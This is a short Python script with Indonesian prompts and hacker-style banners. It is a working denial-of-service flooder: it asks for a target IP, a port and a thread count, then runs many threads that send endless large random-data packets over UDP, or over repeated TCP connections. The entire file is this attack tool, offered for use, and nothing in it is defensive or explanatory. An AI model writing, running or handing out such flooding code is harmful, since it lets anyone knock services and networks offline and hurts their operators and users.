#Autor By Zeus(Zarkhan
import random
import socket
import threading
import os

os.system("clear")
print("#-- ZARKHANxZEUS --#")
print("--> ZC <--")
print("#-- TOOLS BY ZEUS--#")
ip = str(input(" Masukan IP:"))
port = int(input(" Port:"))
choice = str(input(" Gas Attack Gak ni?(y/n):"))
times = int(input(" Mau Berapa Virus?:"))
threads = int(input(" Isi Berapa Virus?:"))
def run():
	data = random._urandom(20000)
	i = random.choice(("[*]","[!]","[#]"))
	while True:
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
			addr = (str(ip),int(port))
			for x in range(times):
				s.sendto(data,addr)
			print(i +" AttackByZc!!!")
		except:
			print("[!] AttackByZc!!!")

def run2():
	data = random._urandom(696969)
	i = random.choice(("[*]","[!]","[#]"))
	while True:
		try:
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.connect((ip,port))
			s.send(data)
			for x in range(times):
				s.send(data)
			print(i +" Attack!!!")
		except:
			s.close()
			print("[*] ServerNyaTuru")

for y in range(threads):
	if choice == 'y':
		th = threading.Thread(target = run)
		th.start()
	else:
		th = threading.Thread(target = run2)
		th.start()